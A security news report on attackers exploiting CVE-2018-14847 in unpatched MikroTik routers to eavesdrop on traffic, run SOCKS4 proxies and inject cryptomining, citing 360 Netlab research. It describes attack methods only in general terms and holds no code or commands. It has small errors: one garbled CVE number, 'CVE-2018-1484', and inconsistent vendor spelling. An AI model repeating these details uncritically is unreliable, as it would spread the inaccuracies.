Endpoint Security , Governance & Risk Management , Incident & Breach Response
MikroTik Routers Targeted in Data Eavesdropping SchemeResearchers: Attackers Continue to Meddle With Hundreds of Thousands of MikroTik Routers
Unknown attackers are intercepting every piece of data handled by more than 7,500 routers made by MikroTik, while also using another 239,000 compromised routers to serve as proxies, according to new research from 360's Network Security Research Lab.
See Also: Live Webinar | Education Cybersecurity Best Practices: Devices, Ransomware, Budgets and Resources
The finding is the latest bad news centering on poorly secured internet of things devices, as attackers have continued to pound routers built by MikroTik. The manufacturer, based in Latvia, issued a patch in April for the vulnerability, designated CVE-2018-14847. But despite warnings from researchers and MikroTik, hundreds of thousands of routers remain unpatched and internet-connected. And attackers have come calling.
The vulnerability in the router can be used to gain access to Winbox, a simple GUI administration utility for MicroTik's RouterOS, as well as to Webfig, the web-based version of the utility. Successfully exploiting the vulnerability gives an attacker complete access to the router. A write-up showing how the vulnerability can be exploited was posted by Alireza Mosajjal of Iran's computer emergency readiness team, BASU CERT.
Attackers often hunt for poorly protected routers because such devices can be used to launch massive distributed denial-of-service attacks or spy on anyone who uses them. For a subset of vulnerable MicroTik router operators, researchers warn that attackers do appear to be recording all web traffic.
"We ... discovered that more than 7,500 victims are being actively eavesdropped [on], with their traffic being forwarded to IPs controlled by unknown attackers," researchers at 360's Network Security Research Lab write.
In these cases, the researchers note that attackers have been employing a feature built into RouterOS that enables anyone with administrator access to forward all packets to another destination.
Many more of the routers have been turned into proxies using the SOCKS4 internet client/server protocol, the researchers say. About 239,000 IPs attached to MikroTik routers are running a SOCKS4 proxy that has been maliciously activated. If the router is rebooted, "the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker's URL," the researchers write. "It is hard to say what the attacker is up to with this many SOCKS4 proxies but we think this is something significant."
By the researchers' count, there are 370,000 MikroTik routers in the wild that have the CVE-2018-1484 flaw and are thus still vulnerable to being easily compromised.
"We strictly followed the Winbox communication protocol to make sure those devices are indeed MikroTik routers, and to verify if the device has been hacked and what the hacked box is [doing]," the researchers write.
Most of the affected routers are in Russia and Brazil, they say. Other countries with notable numbers of hacked routers include Indonesia, India, Iran, Italy, Poland, the United States, Thailand and Ukraine.
This isn't the first time that researchers have warned that MikroTik routers are being compromised by attackers (see Hacked MicroTik Routers Serve Cryptocurrency-Mining Malware).
Victims are usually unaware that their PC has been pressed into service via this type of cryptomining attack, although it does cause CPUs to work harder and consumes extra electricity.
The researchers, reviewing the attack campaign, note that attackers attempted to redirect all HTTP proxy requests on an infected site to an HTTP 403 error page that would inject Coinhive. "By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users' devices," the researchers say.
But it's not clear how successful these attacks might have been. Notably, the external resources needed for mining "are blocked by the proxy ACL [access control lists] set by the attackers themselves," the researchers write.